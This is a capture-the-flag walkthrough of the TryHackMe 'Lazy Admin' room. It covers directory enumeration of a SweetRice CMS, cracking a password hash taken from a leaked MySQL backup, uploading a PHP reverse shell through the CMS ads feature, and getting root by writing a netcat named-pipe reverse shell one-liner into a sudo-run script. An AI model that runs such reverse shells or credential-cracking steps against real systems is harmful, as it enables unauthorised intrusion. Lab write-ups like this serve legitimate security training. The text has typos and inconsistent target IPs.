Lazy Admin TryhackMe

Lazy Admin TryhackMe

Easy Linux machine to practice your skills

Enumeration

I started a Rustscan scan and found both an SSH service and a web server.

rustscan -a 10.10.48.129 -- -A -sC -sV        
The scan shows two open ports: port 80 and port 22. Port 80 is running Apache.

I went to the web server in my browser and found a default Apache landing page:

We run dirbuster to get directories.

We discovered a directory named "/content," which we then accessed by browsing it.


We discovered a webpage for CMS SweetRice, a content management system for management websites. Therefore, we ran Gobuster on the "/content" directory.

obuster dir -u 10.10.118.244 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
        
10.

At /as I got this

We got more directories the “/as” directory contains a login page but we don’t have credentials to log in so we checked other directories we checked “/inc” directory


I received a mysql_backup/ file. we checked other directories we checked “/conten/inc” directory.

We got a “mysql_backup/” folder so we checked that folder.

We successfully downloaded a file that may contain valuable information, prompting us to investigate the MySQL backup database.

I discovered the hash of the password and the username in this file. Then, I proceeded to CrackStation to decrypt the hash.

Now we have a username and password so we can try to log in on the directory we found “/as”

With the obtained credentials, we successfully logged in to the SweetRice Dashboard.

In the Ads section, we can add a script to establish a reverse connection. I downloaded a PHP reverse shell script from
upload now

After clicking "Done," the script was uploaded. Subsequently, we initiated a Netcat listener.

nc -lvnp 1234        

Now, we need to click on our reverse shell to establish a connection.

Now we have to click on our reverse shell to get a connection.

Now you can read the user flag with “ cat user.txt” command and we can also upgrade this shell.

Privilege Escalation

So, we checked what permissions we have using the sudo -l command.

sudo -l        

This script runs a bash script “/etc/copy.sh” let’s check this file

$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f" > /etc/copy.sh
        


Begin a Netcat listener to receive the reverse shell, then execute the modified file to establish the reverse connection.

Looks like we've attained root access!



要查看或添加评论,请登录

Vrijanandan Kumar的更多文章

  • Red - TryHackMe Walkthrough

    Red - TryHackMe Walkthrough

    https://tryhackme.com/room/redisl33t Initial Information Gathering We begin our reconnaissance phase with a Nmap scan.

  • Vulnversity — Walkthrough Tryhackme

    Vulnversity — Walkthrough Tryhackme

    Introduction "Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing…

    1 条评论
  • Library Tryhackme

    Library Tryhackme

    Start the VPN you have downloaded and deploy the TryHackMe machine first. Then, ping and check the machine's…

    1 条评论
  • Seppuku | OffSec Writeup

    Seppuku | OffSec Writeup

    Network scanning We used Nmap for port scanning. We used Nmap for port enumeration and discovered the following open…

    1 条评论
  • TryHackMe: Mr. Robot CTF

    TryHackMe: Mr. Robot CTF

    Difficulty: Medium Room URL: https://tryhackme.com/room/mrrobot Scanning It was known that port 80, 443 and 22 were…

  • Tryhackme-GmingServer Walkthrough

    Tryhackme-GmingServer Walkthrough

    Network Enumeration I started the network enumeration by running a port scan using rustscan looking for open ports and…

  • SQLMAP -TryhackMe Writeup

    SQLMAP -TryhackMe Writeup

    Task 1: Introduction What is Sqlmap ? Sqlmap is an open-source penetration testing tool designed to automate the…

    1 条评论
  • Katana Walkthrough (offsec_lab)

    Katana Walkthrough (offsec_lab)

    https://portal.offsec.

  • MoneyBox (Vulnhub WalkThrough)

    MoneyBox (Vulnhub WalkThrough)

    MoneyBox (Vulnhub WalkThrough) Today I’m going to solve challenge MoneyBox Vulnhub WalkThrough. Offensive Security Edit…

  • Gaara Vulnhub(walkthrough)

    Gaara Vulnhub(walkthrough)

    Gaara Vulnhub(walkthrough) 01.) Target Discovery with Nmap 02.

社区洞察

其他会员也浏览了